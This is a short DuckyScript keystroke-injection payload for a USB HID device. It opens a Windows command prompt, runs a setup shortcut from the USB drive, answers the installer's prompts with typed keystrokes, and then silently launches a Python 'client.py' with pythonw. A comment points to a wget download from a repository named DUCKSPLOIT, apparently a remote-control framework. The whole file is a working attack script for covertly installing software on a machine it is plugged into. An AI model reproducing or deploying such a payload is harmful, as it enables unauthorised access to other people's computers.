DELAY 5000
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 1000
ENTER
REM get wget https://github.com/canarddu38/DUCKSPLOIT/blob/root/CLIENT/wget.exe?raw=true
STRING call F:/copy/scripts/setup.Lnk
ENTER
DELAY 500
STRING call E:/copy/scripts/setup.Lnk
ENTER
DELAY 1500
LEFTARROW
ENTER
DELAY 2000
STRING O
ENTER
STRING Y
ENTER
STRING t
ENTER
StRING a
ENTER
ENTER
DELAY 500 
ENTER
ENTER
DELAY 200
ENTER
DELAY 200
ENTER
DELAY 200
ENTER

DELAY 10000
STRING start pythonw.exe F:/client.py
ENTER
DELAY 500
STRING start pythonw.exe E:/client.py
ENTER
DELAY 200
STRING exit
ENTER
END
